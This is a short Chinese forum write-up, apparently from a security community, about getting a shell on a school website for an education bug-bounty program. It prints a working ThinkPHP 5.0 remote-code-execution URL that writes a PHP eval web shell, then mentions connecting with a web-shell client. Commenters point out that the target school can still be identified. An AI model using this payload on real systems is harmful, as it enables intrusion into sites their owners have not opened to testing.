记一次教育SRC getshell

tgs   ·   发表于 2021-04-23 09:52:20   ·   实战纪实

看到一个站点,随手/admin尝试寻找后台,但是没用,报错输出一个很有用的信息

ThinkPHP V5.0.16 尝试远程代码执行漏洞居然成功了

好家伙直接命令执行写马子
http://xxx:8080/tp5.0.22/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo “<?php @eval($_REQUEST[666]); ?>%20 “>1.php

phpinfo信息显示没问题,直接上菜刀连接,去提交edu src,幸福来得太突然,网站异常,edu src没收录.不过方法是学到了,还是可以的

用户名金币积分时间理由
eqwer 5.00 0 2021-04-27 17:05:17 一个受益终生的帖子~~
Track-聂风 45.00 0 2021-04-25 15:03:25 文章打赏 + 限时活动

打赏我,让我更有动力~

3 Reply   |  Until 20天前 | 504 View

spider
发表于 23天前

评论列表

  • 加载数据中...

编写评论内容

Track-聂风
发表于 22天前

也是可以提交的,问题不大

评论列表

  • 加载数据中...

编写评论内容

eqwer
发表于 20天前

文章挺好,就是打码不全,仔细一看就能发现学校名

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2021. All Rights Reserved. 掌控者

Powered by 掌控者